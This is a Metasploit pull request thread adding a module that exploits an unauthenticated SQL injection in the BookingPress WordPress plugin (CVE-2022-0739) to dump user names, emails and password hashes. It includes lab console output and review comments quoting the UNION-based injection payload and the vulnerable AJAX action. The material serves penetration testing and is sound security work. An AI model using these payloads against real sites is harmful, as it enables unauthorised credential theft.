Add Gather Module for WP BookingPress Plugin SQLi (CVE-2022-0739)
rapid7/metasploit-framework pull request #17242
Opened 2022-11-08 21:51 UTC by jheysel-r7

The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection. This PR adds a gather module to exploit this vulnerability and retrieve usernames, user email addresses and user password hashes from the database. 

## Verification

- [ ] Start `msfconsole`
- [ ] Start msfconsole
- [ ] Do: `use gather/wp_bookingpress_category_services_sqli`
- [ ] Set the options `RHOSTS` (you may also have to set `RPORT` and `BOOKING_PRESS_PAGE` depending on how the target is configured)
- [ ] Run the module
- [ ] Receive `Wordpress User Credentials` information displayed in a table

## Scenarios
### Booking Press 1.0.10, Wordpress Running Via Docksal, Ubuntu 20.04
```
msf6 > use gather/wp_bookingpress_category_services_sqli
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rhosts localhost
rhosts => localhost
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rport 8000
rport => 8000
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Found 5 users in the database
[*] Extracting credential information
Wordpress User Credentials
==========================

 Username       Email                         Hash
 --------       -----                         ----
 admin          admin@admin.com               $P$BfxUckldN6AiHPD0BK6jg58se2b.aL.
 hackerman      hackerman@hacktheworld.io     $P$BESfz7bqSOY8VkUfuYXAZ/bT5E36ww/
 mr_metasploit  mr_metasploit@metaslpoit.org  $P$BDb8pIfym5dS6WTnNU8vU5Uk6i89fk.
 msfuser        msfuser@rapid7.com            $P$BpITVDPiqOZ7fyQbI5g9rsgUvZQFBd1
 todd           todd@toddtown.com             $P$BnlpkVgxGFWnmvdDQ3JStgpIx8LMFj0

[*] Auxiliary module execution completed
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set AutoCheck false
AutoCheck => false
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run

[!] AutoCheck is disabled, proceeding with exploitation
[*] Found 5 users in the database
[*] Extracting credential information
Wordpress User Credentials
==========================

 Username       Email                         Hash
 --------       -----                         ----
 admin          admin@admin.com               $P$BfxUckldN6AiHPD0BK6jg58se2b.aL.
 hackerman      hackerman@hacktheworld.io     $P$BESfz7bqSOY8VkUfuYXAZ/bT5E36ww/
 mr_metasploit  mr_metasploit@metaslpoit.org  $P$BDb8pIfym5dS6WTnNU8vU5Uk6i89fk.
 msfuser        msfuser@rapid7.com            $P$BpITVDPiqOZ7fyQbI5g9rsgUvZQFBd1
 todd           todd@toddtown.com             $P$BnlpkVgxGFWnmvdDQ3JStgpIx8LMFj0

[*] Auxiliary module execution completed
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) >

2022-11-09 18:13 UTC, RapidWolf95 commented
Really excited to see this module has been created! I did want to note that I am running this against a WordPress site with BookingPress and I got the following output:
```
[*] Found 2 users in the database
[*] Extracting credential information
[-] Auxiliary failed: NameError uninitialized constant Metasploit::Framework::Hashes
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb:134:in `run'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/auto_check.rb:21:in `block in run'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/auto_check.rb:36:in `with_prepended_auto_check'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/remote/auto_check.rb:20:in `run'
[*] Auxiliary module execution completed
```

I was able to resolve this by commenting out line 134 of wp_bookingpress_category_services_sqli.rb. I'm not sure if that is an issue on my side, but either way, the script works perfectly after that's done. 

Thanks again for your work on this!

2022-11-09 23:06 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/gather/wp_bookingpress_category_services_sqli.md
> +1. Create a new "category" and associate it with a new "service" via the BookingPress admin menu
How do you do this? More information needed to clarify this step.

2022-11-10 15:47 UTC, smcintyre-r7 reviewed
Would also be worth while to check if this could be updated to use the SQLi library provided by Metasploit.

2022-11-10 15:47 UTC, smcintyre-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +                                generate_vars_post(') UNION ALL SELECT @@VERSION,2,3,4,5,6,7,count(*),9 from wp_users-- -')
Whitespace is a bit off here.

2022-11-10 15:47 UTC, smcintyre-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      OptString.new('BOOKING_PRESS_PAGE', [ true, 'The webpage that bookingPress is running on', '/bookingpress/' ])
Should this be `TARGETURI` instead of `BOOKING_PRESS_PAGE`? I see lower down on L52, you're referencing `#target_uri`.

2022-11-10 15:47 UTC, smcintyre-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    number_of_users = JSON.parse(res&.body)[0]['bookingpress_service_position'].to_i
The most common problem that may happen is is that `res` will be `nil` if there's a connection or timeout error. Would be worth checking for that case explicitly before moving on to parsing the body.

Could also use: `res.get_json_document` here.

2022-11-10 15:47 UTC, smcintyre-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      fail_with(Failure::UnexpectedReply, 'Unable to retrieve JSON response from SQL injection') unless JSON.parse(res&.body)[0].is_a? Hash
I'd suggest checking that `res` is not nil here before parsing the response.

2022-11-10 20:21 UTC, jheysel-r7 commented
@smcintyre-r7 as per our module hacking discussion: My apologies because I definitely could be incorrect here but I'm not sure it makes sense to use the SQLi library in this scenario. I'm only seeing support for: `BooleanBasedBlind` and `TimeBasedBlind` under `Msf::Exploit::SQLi::MySQLi::`.

This is a Union based SQLi. I was looking into the other modules that exploit a Union based SQLi and none of them seem to `include Msf::Exploit::SQLi` they just send a single request that exploits the injection (could just be because they were written before the library was implemented). Please let me know what you think.

2022-11-10 20:40 UTC, h00die commented
@red0xff see above (@red0xff wrote the libs)

2022-11-10 20:45 UTC, jheysel-r7 commented on documentation/modules/auxiliary/gather/wp_bookingpress_category_services_sqli.md
> +1. Create a new "category" and associate it with a new "service" via the BookingPress admin menu
My apologies. I've updated the documentation to walk the user through each individual click that must be made to accomplish this step.

2022-11-10 22:56 UTC, red0xff commented
I sent a PR: https://github.com/jheysel-r7/metasploit-framework/pull/4

For union-based injections (and any other types of SQL injections where the output of a user-controlled query gets returned in the server response), the `Common` class under `Msf::Exploit::SQLi::<DBMS>` can be used.

2022-11-11 12:34 UTC, h00die commented
dont forget to add the plugin to https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/wp-exploitable-plugins.txt

2022-11-14 22:44 UTC, gwillcox-r7 requested changes

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +          unauthenticated users), leading to an unauthenticated SQL Injection.
```suggestion
The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied data
in the `total_service` parameter of the `bookingpress_front_get_category_services` AJAX action
(available to unauthenticated users), prior to using it in a dynamically constructed SQL query.
As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive
data from the backend database such as usernames and password hashes.

This module uses this vulnerability to dump the list of WordPress users and their associated
email addresses and password hashes for cracking offline.
```

This will include the parameter name and also describe the impact of such actions as well as what the module does.

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +          'jheysel-r7' # module
Missing credit to destr4ct for the PoC.

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +          'cyllective', # discovery
This should really be cydave of cyllective according to https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    return 'Unable to get wp-nonce for an unauthenticated user' unless res&.body&.match("_wpnonce:'(\\w+)' };")
```suggestion
    return 'Unable to get wp-nonce as an unauthenticated user' unless res&.body&.match("_wpnonce:'(\\w+)' };")
```

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    return 'Unable to get wp-nonce for an unauthenticated user' unless res&.body&.match("_wpnonce:'(\\w+)' };")
This regex looks odd. Right now it will match on this `_wpnonce:'\wwwwwww' };` but not on this `_wpnonce:'asdf' };`. 

So two questions:
1. Is that meant to be `\\w+` or was it meant to be `\w+`?
2. Is that space before the `};` needed? Is it possible to make that optional?

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    return Exploit::CheckCode::Unknown if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
```suggestion
    return Exploit::CheckCode::Unknown if @nonce == 'Unable to get wp-nonce as an unauthenticated user'
```

This static string method of checking things is a really bad practice, particularly without the use of constants. Now your duplicating code all over the place and every time you change one instance you have to manually search for and edit all the rest of them, which will only grow to be a bigger problem over time.

I'd recommend using constants or a integer instead.

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      'action' => 'bookingpress_front_get_category_services', # vulnerable action,
```suggestion
      'action' => 'bookingpress_front_get_category_services', # Vulnerable AJAX action
```

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      'total_service' => "#{rand(100..10000)}#{sqli}"
Is there any way this could be alphanumberic or generated using Rex::Text? I don't know if our preference for numbers only generation would be rand or Rex::Text here but would be good to check that as well if applicable.

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +            generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users-- -")
According to https://dev.mysql.com/doc/refman/8.0/en/comments.html#:~:text=MySQL%20Server%20supports%20three%20comment,newline%2C%20and%20so%20on), you only need to add at least one whitespace character after the `--` characters for it to take effect. Therefore this may work:

```suggestion
            generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users-- ")
```

Also if `#` is an allowed character we could simplify this to just this:

```
generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users#")
```

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      res.get_json_document[0]['bookingpress_service_id']
This is missing a bunch of checks. For starters, the server response needs to be checked to ensure its not `nil`, that it has the right response code, is formatted as expected, etc. You should also be breaking this down as its possible `get_json_document[0]` points to a `nil` object, which will cause this to crash.

Finally, you should probably be wrapping this in handlers as `get_json_document` could fail to parse the response even if there is one returned.

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    @nonce ||= get_user_nonce
This will be set to a string if it fails, which will still pass the `||=` check but will lead to errors later on.

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    fail_with(Failure::UnexpectedReply, 'Unable to get wp-nonce for an unauthenticated user') if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
See comment above about using string comparisons for checking success and the point about having to now update all the code areas any time one of these strings change. I'd much rather see a constant being used here or even just using a number. The current code is too messy of a solution for me to let this land into our main branch.

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    @sqli ||= get_sqli_object
Again similar issue here in that you have no checks on this return value. Given you are using this both in the `check` method and in your main code I'd expect this to return something consistent on failure and then the `check` method can use that to return an appropriate check code, whilst the main `run` method can use that to `fail_with` appropriately.

2022-11-14 22:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +        jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),
Correct me if I am wrong but did one of our users report an error when using this module on this line? Was that fixed?

2022-11-15 15:02 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    number_of_users = JSON.parse(res&.body)[0]['bookingpress_service_position'].to_i
Partially fixed, I've raised another issue related to this which needs addressing and is in a similar vein r.e checking `res` response.

2022-11-18 18:51 UTC, jheysel-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    return 'Unable to get wp-nonce for an unauthenticated user' unless res&.body&.match("_wpnonce:'(\\w+)' };")
1. It is meant to be `\\w+`.

The testing you did is true when testing with [Rubular](https://rubular.com/) or some similar tool. When writing ruby code, when surrounding a regex matching string with double quotes (because you need to match single quotes) you need to double escape your special characters. Ex: 
```
➜  metasploit-framework git:(bookingpress-cve-2022-0739) ✗ irb
3.0.2 :001 > a = "_wpnonce:'asdf' };"
 => "_wpnonce:'asdf' };"
3.0.2 :002 > a.match("_wpnonce:'(\\w+)' };")
 => #<MatchData "_wpnonce:'asdf' };" 1:"asdf">
 ```
 2. The space is needed. The only implementation of the program I've seen has the space, but making it optional wouldn't hurt.

2022-11-18 18:51 UTC, jheysel-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      'total_service' => "#{rand(100..10000)}#{sqli}"
I've tested this and it has to be an integer. Going to leave as is.

2022-11-18 18:51 UTC, jheysel-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +            generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users-- -")
I've tested both of those suggestions and unfortunately neither of them work. The SQLi seems to be rather particular and needs to end in `wp_users-- -`

2022-12-02 23:42 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +  NONCE_NOT_FOUND_ERROR_MSG = 'Unable to get wp-nonce for an unauthenticated user'.freeze
Change `for` here to `as`

2022-12-02 23:43 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    return Exploit::CheckCode::Unknown if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
Confirmed this is resolved. Thanks for doing this @jheysel-r7 looks a lot neater!

2022-12-02 23:44 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +            generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users-- -")
Hmm well was worth a shot, thanks for checking 👍 Will mark this as resolved.

2022-12-02 23:48 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    @nonce ||= get_user_nonce
Recent updates seem to have fixed this issue, marking resolved.

2022-12-02 23:52 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    fail_with(Failure::UnexpectedReply, 'Unable to get wp-nonce for an unauthenticated user') if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
New solution looks good, marking resolved 👍

2022-12-02 23:53 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      res.get_json_document[0]['bookingpress_service_id']
Checks are better on this but the `get_json_document[0]` is still an issue here. Catching `JSON::ParserError` might solve some instances of this but this is not guarenteed.

2022-12-02 23:55 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +        print_error("Invalid response code #{res.code} for from SQLi attempt: response")
Not sure what `: response` is referring to here. Was that meant to be the contents of the response interpolated? The wording here is a bit confusing.

2022-12-02 23:57 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +        print_error("Invalid response code #{res.code} for from SQLi attempt: response")
Also the use of `for from SQLi` looks like a typo here, and might tie into the above point. This looks like this line may have been edited from something earlier and some words were left in as a result?

2022-12-02 23:59 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    return 'Unable to get wp-nonce for an unauthenticated user' unless res&.body&.match("_wpnonce:'(\\w+)' };")
Changes look good and thanks for explaining your logic behind this, I'll go ahead and mark this as resolved 👍

2022-12-03 00:05 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +        jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),
Hmm in my tests I was unable to replicate this when not connected to a database:

```
>> Metasploit::Framework::Hashes.identify_hash("a")
=> ""
>> exit
msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > db_status
[*] postgresql selected, no connection                             
msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >           
```

If @RapidWolf95 is able to provide reproduction steps for this issue that work on the latest code base I'll be happy to look into this further but as I'm unable to replicate it at this time I'm happy to proceed for now.

2022-12-03 00:07 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +        jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),
This also seems to work when connected to the database:

```
irb: warn: can't alias jobs from irb_jobs.
>> Metasploit::Framework::Hashes.identify_hash("a")
=> ""
>> exit
msf6 > msfdb_status
[-] Unknown command: msfdb_status
msf6 > db_status             
[*] Connected to msf. Connection type: postgresql.
msf6 >        
```

2022-12-03 00:42 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      res.get_json_document[0]['bookingpress_service_id']
For reference the definition of this function is:

https://github.com/rapid7/metasploit-framework/blob/364fb85e1d9b1970553fee08d93b73d13a09d0fa/lib/rex/proto/http/response.rb#L123-L133

Therefore I'm not even sure the `JSON::ParserError => e` part in the updated code would be hit as it would be handled earlier on in this function? 

Here is my tests for this:

```
?> def test
?>   raise JSON::ParserError
>> end
=> :test
?> def test3
?>   begin
?>     test2
?>   rescue JSON::ParserError => e
?>     print("nope")
?>   end
>> end
=> :test3
?> def test2
?>   begin
?>     test
?>   rescue JSON::ParserError => e
?>     print("A")
?>   end
>> end
=> :test2
>> test3
A=> nil
>> 
```

Note that here the exception is caught by the first rescue statement and is not populated to the earlier rescue statements.

2022-12-03 01:00 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      res.get_json_document[0]['bookingpress_service_id']
Also not sure that using element `[0]` here will work given that `get_json_document` is supposed to return a hash and given the following:

```
>> a = {a: "a"}
=> {:a=>"a"}
>> a[0]
=> nil
>> a[:a]
=> "a"
>>       
```

I'll try to rework this though, but might be missing something.

2022-12-05 17:13 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/gather/wp_bookingpress_category_services_sqli.md
> +1. Beside `Manage Servers` click `+ Add New`, enter a `Service Name`, enter the Category you just created in the `Category` dropdown, enter a `Price` and click `Save`.
```suggestion
1. Beside `Manage Services` click `+ Add New`, enter a `Service Name`, enter the Category you just created in the `Category` dropdown, enter a `Price` and click `Save`.
```

2022-12-05 19:06 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      res.get_json_document[0]['bookingpress_service_id']
Added some more validation here after further observations in https://github.com/rapid7/metasploit-framework/pull/17242/commits/53ffd4f23acc375afb42f8301a6ed912bdd2838a

2022-12-05 20:33 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +      fail_with(Failure::UnexpectedReply, 'Unable to retrieve JSON response from SQL injection') unless JSON.parse(res&.body)[0].is_a? Hash
Resolved with updated checking logic.

2022-12-05 20:34 UTC, gwillcox-r7 commented on modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
> +    number_of_users = JSON.parse(res&.body)[0]['bookingpress_service_position'].to_i
Code in question has since been removed and updated code with logic checks has been added in place. Marking resolved.

2022-12-05 21:03 UTC, gwillcox-r7 approved these changes

2022-12-05 21:05 UTC, merged

2022-12-05 21:14 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added for CVE-2022-0739 which is an unauthenticated SQL injection in WP BookingPress prior to 1.0.11 in the `bookingpress_front_get_category_services` AJAX action. Successful exploitation using the module allows unauthenticated attackers to gain the hashed passwords of WordPress users on the target site.